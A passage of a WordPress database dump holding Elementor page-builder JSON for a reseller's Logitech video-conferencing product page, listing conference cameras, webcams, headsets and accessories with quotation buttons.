meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b363b98\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35986ce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64637ebe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"product-details-ctn\\\"><h2 style=\\\"text-align: center;\\\">\\u00a0<\\/h2><p><img class=\\\"wp-image-1327 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SMARTDOCK<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">WEBCAMS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1332 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech Brio<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"aligncenter wp-image-1334 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C9230e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1336 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C925e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p>\\u00a0<img class=\\\"wp-image-1354 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech B525<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table><\\/div><h2>\\u00a0<\\/h2><h2 style=\\\"text-align: center;\\\">HEADSETS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p><p><img class=\\\"wp-image-1364 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech H570e Headset<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">VIDEO COLLABORATION ACCESSORIES<\\/h2><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1386\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SmartDock Extender Box<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1391\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Screen Share<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1392\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Group Expansion Mics<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1397\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Logitech SmartDock Flex<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1401\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 15m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1404\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 10m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p><img class=\\\"aligncenter wp-image-1406 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">MeetUp Expansion Mic<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5365,16,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"cd63719\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-bcc950\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"c6bed49\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally-camera\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":20,\"padding\":{\"unit\":\"px\",\"top\":\"45\",\"right\":\"45\",\"bottom\":\"45\",\"left\":\"45\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 